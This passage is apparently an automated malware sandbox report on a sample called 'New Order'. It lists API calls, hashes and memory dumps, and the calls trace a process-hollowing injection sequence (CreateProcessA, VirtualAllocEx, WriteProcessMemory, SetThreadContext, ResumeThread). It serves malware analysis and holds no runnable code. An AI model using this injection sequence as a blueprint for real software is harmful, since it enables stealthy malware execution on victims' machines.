                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 11be92d01e7a7672e2f5a0cd9fbf76debe3abfc57b2d56d9f52f7c35475b4240
                                                                                                                              • Instruction ID: 99df933977dac25e0840b45583ac43687aa4f72fadca32181e0d4f85742d0096
                                                                                                                              • Opcode Fuzzy Hash: 11be92d01e7a7672e2f5a0cd9fbf76debe3abfc57b2d56d9f52f7c35475b4240
                                                                                                                              • Instruction Fuzzy Hash: 85B13A31E502598FDB54CFA5C89079DBFF2AF88300F14D5AAD809AB255DB309985CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a241051b8fb5a434e13886d5be04ec937e6fd1f58558a393f5e4607e26242ba9
                                                                                                                              • Instruction ID: a62e78bcd492f7fda71941a43514e051443331ed3a7025dc897826803633cd05
                                                                                                                              • Opcode Fuzzy Hash: a241051b8fb5a434e13886d5be04ec937e6fd1f58558a393f5e4607e26242ba9
                                                                                                                              • Instruction Fuzzy Hash: EB2150B8819214DFCB25DF50C9447F8BBB8EB2A315F0495DB940EA32A1C7309AC6CF00

                                                                                                                              Control-flow Graph

                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074A7126
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0

                                                                                                                              Control-flow Graph

                                                                                                                              • [Graph image not reproduced; legend: Executed / Not Executed. Graph starts at block 74a6ef0-74a6f85; API call in graph: CreateProcessA]
                                                                                                                              APIs
                                                                                                                              • CreateProcessA.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 074A7126
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateProcess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 963392458-0

                                                                                                                              Control-flow Graph

                                                                                                                              • [Graph image not reproduced; legend: Executed / Not Executed. Graph starts at block 2d9b0d0-2d9b0df; API call in graph: GetModuleHandleW]
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 02D9B326
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0

                                                                                                                              Control-flow Graph

                                                                                                                              • [Graph image not reproduced; legend: Executed / Not Executed. Graph starts at block 5510aa8-5511d56; API call in graph: CreateWindowExW]
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05511E02
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0

                                                                                                                              Control-flow Graph

                                                                                                                              • [Graph image not reproduced; legend: Executed / Not Executed. Graph starts at block 5511ce4-5511d56; API call in graph: CreateWindowExW]
                                                                                                                              APIs
                                                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 05511E02
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 716092398-0

                                                                                                                              Control-flow Graph

                                                                                                                              • [Graph image not reproduced; legend: Executed / Not Executed. Graph starts at block 5510bfc-55142fc; API call in graph: CallWindowProcW]
                                                                                                                              APIs
                                                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 05514381
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CallProcWindow
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2714655100-0

                                                                                                                              Control-flow Graph

                                                                                                                              • [Graph image not reproduced; legend: Executed / Not Executed. Graph starts at block 2d944b4-2d959b9; API call in graph: CreateActCtxA]
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02D959A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0

                                                                                                                              Control-flow Graph

                                                                                                                              • [Graph image not reproduced; legend: Executed / Not Executed. Graph starts at block 2d958ed-2d958f3; API call in graph: CreateActCtxA]
                                                                                                                              APIs
                                                                                                                              • CreateActCtxA.KERNEL32(?), ref: 02D959A9
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Create
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2289755597-0

                                                                                                                              Control-flow Graph

                                                                                                                              • [Graph image not reproduced; legend: Executed / Not Executed. Graph starts at block 60b27c0-60b27e5; API call in graph: CreateIconFromResourceEx]
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2181853578.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_60b0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0

                                                                                                                              Control-flow Graph

                                                                                                                              • [Graph image not reproduced; legend: Executed / Not Executed. Graph starts at block 74a6860-74a68b6; API call in graph: WriteProcessMemory]
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 074A68F8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 298 74a6950-74a69d8 ReadProcessMemory 302 74a69da-74a69e5 298->302 303 74a69ee-74a6a1e 302->303 304 74a69e7-74a69ed 302->304 304->303
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 074A69D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 288 74a6868-74a68b6 290 74a68b8-74a68c4 288->290 291 74a68c6-74a6905 WriteProcessMemory 288->291 290->291 293 74a690e-74a693e 291->293 294 74a6907-74a690d 291->294 294->293
                                                                                                                              APIs
                                                                                                                              • WriteProcessMemory.KERNEL32(?,?,00000000,?,?), ref: 074A68F8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessWrite
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3559483778-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 308 74a6290-74a62e3 311 74a62f3-74a6323 Wow64SetThreadContext 308->311 312 74a62e5-74a62f1 308->312 314 74a632c-74a635c 311->314 315 74a6325-74a632b 311->315 312->311 315->314
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074A6316
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 319 2d9cc40-2d9d634 DuplicateHandle 321 2d9d63d-2d9d65a 319->321 322 2d9d636-2d9d63c 319->322 322->321
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D9D566,?,?,?,?,?), ref: 02D9D627
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 325 74a6298-74a62e3 327 74a62f3-74a6323 Wow64SetThreadContext 325->327 328 74a62e5-74a62f1 325->328 330 74a632c-74a635c 327->330 331 74a6325-74a632b 327->331 328->327 331->330
                                                                                                                              APIs
                                                                                                                              • Wow64SetThreadContext.KERNEL32(?,00000000), ref: 074A6316
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ContextThreadWow64
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 983334009-0
                                                                                                                              APIs
                                                                                                                              • ReadProcessMemory.KERNEL32(?,?,?,?,?), ref: 074A69D8
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MemoryProcessRead
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 1726664587-0
                                                                                                                              APIs
                                                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,02D9D566,?,?,?,?,?), ref: 02D9D627
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: DuplicateHandle
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3793708945-0
                                                                                                                              APIs
                                                                                                                              • CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,060B27DA,?,?,?,?,?), ref: 060B287F
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2181853578.00000000060B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 060B0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_60b0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: CreateFromIconResource
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3668623891-0
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 074A6816
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              APIs
                                                                                                                              • VirtualAllocEx.KERNEL32(?,?,?,?,?), ref: 074A6816
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: AllocVirtual
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4275171209-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ResumeThread
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 947044025-0
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 074A97D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              APIs
                                                                                                                              • PostMessageW.USER32(?,00000010,00000000,?), ref: 074A97D5
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessagePost
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 410705778-0
                                                                                                                              APIs
                                                                                                                              • GetModuleHandleW.KERNEL32(00000000), ref: 02D9B326
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: HandleModule
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4139908857-0
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 2f51113b6143a5c913dacbcbaf25da6a8c21e962bde9a4e04c83edf1922efc83
                                                                                                                              • Instruction ID: 24e54e6358c7a04a4f13706ed511142f010a4dad5fed1d3df371cbc8c4f7345b
                                                                                                                              • Opcode Fuzzy Hash: 2f51113b6143a5c913dacbcbaf25da6a8c21e962bde9a4e04c83edf1922efc83
                                                                                                                              • Instruction Fuzzy Hash: A2E10CB4E002599FDB14DFADC590AAEFBB2FF89304F24826AD414A7355D770A942CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 4b20a3357cface6fc9589373f57ffd8937fd4b341da0cde4f2b193e0e5106deb
                                                                                                                              • Instruction ID: 5ad5091b9bf7fcecf410b283fbe4994ab9646e7260edeed96d1f4c05220853a5
                                                                                                                              • Opcode Fuzzy Hash: 4b20a3357cface6fc9589373f57ffd8937fd4b341da0cde4f2b193e0e5106deb
                                                                                                                              • Instruction Fuzzy Hash: 1BE10AB4E002599FDB14DFA9C590AAEFBF2BF49304F25826AD414AB355C730A942CF61
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7909e72098def936cda0178d583cb5b4cd2258b70140048ac0cde7c193fa0c3d
                                                                                                                              • Instruction ID: dcd2757d7b5ca9f0eeac968064ce73f6ff23c9898b24da607b46d18ed156e501
                                                                                                                              • Opcode Fuzzy Hash: 7909e72098def936cda0178d583cb5b4cd2258b70140048ac0cde7c193fa0c3d
                                                                                                                              • Instruction Fuzzy Hash: B4E10BB4E002599FDB14DF9DC590AAEFBB2FF89304F24826AD414AB355D770A942CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 45981590042643027a2cb2fa47994b1a381e942eb95a7d422ef4883896433db1
                                                                                                                              • Instruction ID: 96abae8c9c83e7bc72234c28984c942ffa1de7a41fa7ba2e158be6178130f021
                                                                                                                              • Opcode Fuzzy Hash: 45981590042643027a2cb2fa47994b1a381e942eb95a7d422ef4883896433db1
                                                                                                                              • Instruction Fuzzy Hash: 65E1FAB4E002599FDB14DF9DC590AAEFBB2FF89304F24826AD414AB355D770A942CF60
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 23150d7d55bc9abddc52d81f401e1e4259c72aaf12ab6a6a5ea2a76a5f8d70b6
                                                                                                                              • Instruction ID: 521495c63dbfd118f2233a99c5314cd05edd34795035b22062924763efcc5ee7
                                                                                                                              • Opcode Fuzzy Hash: 23150d7d55bc9abddc52d81f401e1e4259c72aaf12ab6a6a5ea2a76a5f8d70b6
                                                                                                                              • Instruction Fuzzy Hash: 24D1F931D2075ACADB10EBA4D9906AAB7B1FF96300F50C79AD14977250EFB06AC4CF90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: dba588d707686e3c317c73579251ebea8129c1d84f676e160ff8da8452aaf937
                                                                                                                              • Instruction ID: d98fb0edc2cdb9806d19a7563e3d05d37a2c3f743cb6019531f2553aabf435e7
                                                                                                                              • Opcode Fuzzy Hash: dba588d707686e3c317c73579251ebea8129c1d84f676e160ff8da8452aaf937
                                                                                                                              • Instruction Fuzzy Hash: 41D1F735D2075ACADB14EBA4D9906AAB7B2FF95300F50C79AD14977250EFB06AC4CF80
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2168470681.0000000002D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02D90000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_2d90000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 59c2d437e65c2b699b9e30aca7bd43af058b9192c9619e99d7995ce2e4e5a11a
                                                                                                                              • Instruction ID: ee1d92d9be0490ade5c4ade70f09fb0b42e2bda447440f6e95bc40f726086d7b
                                                                                                                              • Opcode Fuzzy Hash: 59c2d437e65c2b699b9e30aca7bd43af058b9192c9619e99d7995ce2e4e5a11a
                                                                                                                              • Instruction Fuzzy Hash: 43A14B32A102058FCF19EFA5C94059EBBB3FF84300B25856AF905AB365DB71ED55CB90
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2177326643.0000000005510000.00000040.00000800.00020000.00000000.sdmp, Offset: 05510000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_5510000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 7c6232921965369b39c6b03dfb627a865fe334fedd87f72cdeb4734a4c62816e
                                                                                                                              • Instruction ID: a556a68e567812343c1ce22e2287193439710604d8ec7825dd1d830492c9cdb9
                                                                                                                              • Opcode Fuzzy Hash: 7c6232921965369b39c6b03dfb627a865fe334fedd87f72cdeb4734a4c62816e
                                                                                                                              • Instruction Fuzzy Hash: 36C135B09227498BF751DF25E84A1893FBABB85324F514709E3616F2E1EFB4148ACF44
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000001.00000002.2183290940.00000000074A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074A0000, based on PE: false
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_1_2_74a0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: 5d33629b9b5cd094b64704be80848cb7128be6fb099342fc79b0a1075e66ac12
                                                                                                                              • Instruction ID: 70ac36fa57d199fa4e168eccf7959399aeabb2b7ac59915e6df21a8d570a39d4
                                                                                                                              • Opcode Fuzzy Hash: 5d33629b9b5cd094b64704be80848cb7128be6fb099342fc79b0a1075e66ac12
                                                                                                                              • Instruction Fuzzy Hash: 55511BB4E002598FDB14DFA9C6916AEFBF2BF89304F24816AD418AB315D7309942CF61

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:1.2%
                                                                                                                              Dynamic/Decrypted Code Coverage:5%
                                                                                                                              Signature Coverage:7.9%
                                                                                                                              Total number of Nodes:139
                                                                                                                              Total number of Limit Nodes:9

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 185 417ea3-417ecc call 42fb63 188 417ed2-417ee0 call 430163 185->188 189 417ece-417ed1 185->189 192 417ef0-417f01 call 42e5d3 188->192 193 417ee2-417eed call 430403 188->193 198 417f03-417f17 LdrLoadDll 192->198 199 417f1a-417f1d 192->199 193->192 198->199
                                                                                                                              APIs
                                                                                                                              • LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00417F15
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Load
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2234796835-0

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 205 42ce83-42cebf call 4045f3 call 42e0c3 NtClose
                                                                                                                              APIs
                                                                                                                              • NtClose.NTDLL(?,?,00000000,00000000,0000001F,?,FA0A1F00), ref: 0042CEBA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_400000_New Order.jbxd
                                                                                                                              Yara matches
                                                                                                                              Similarity
                                                                                                                              • API ID: Close
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 3535843008-0
                                                                                                                              • Opcode ID: e2f605f68d8ee9bbccc42c1446b5379a1ac774e33873eff665959624751413d0
                                                                                                                              • Instruction ID: 0285b116ec681e8c09839647c474c12df3e0b764612613c280807b226c76f132
                                                                                                                              • Opcode Fuzzy Hash: e2f605f68d8ee9bbccc42c1446b5379a1ac774e33873eff665959624751413d0
                                                                                                                              • Instruction Fuzzy Hash: 48E08C722412147BD620EB5ADC01FABB76CEFC5754F00441AFB0CA7242DAB5BA0187F9

                                                                                                                              Control-flow Graph

                                                                                                                              control_flow_graph 219 1842b60-1842b6c LdrInitializeThunk
                                                                                                                              APIs
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000008.00000002.2489535674.00000000017D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 017D0000, based on PE: true
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_8_2_17d0000_New Order.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: InitializeThunk
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2994545307-0
                                                                                                                              • Opcode ID: b0b8f7233550a816782e492171b6ab3682f98508527dad5c61f4e736bfa5af8f
                                                                                                                              • Instruction ID: 708da6853d7115dd6ae460148a3fd5828274f3b1612557eb572eb884a2dded46
                                                                                                                              • Opcode Fuzzy Hash: b0b8f7233550a816782e492171b6ab3682f98508527dad5c61f4e736bfa5af8f
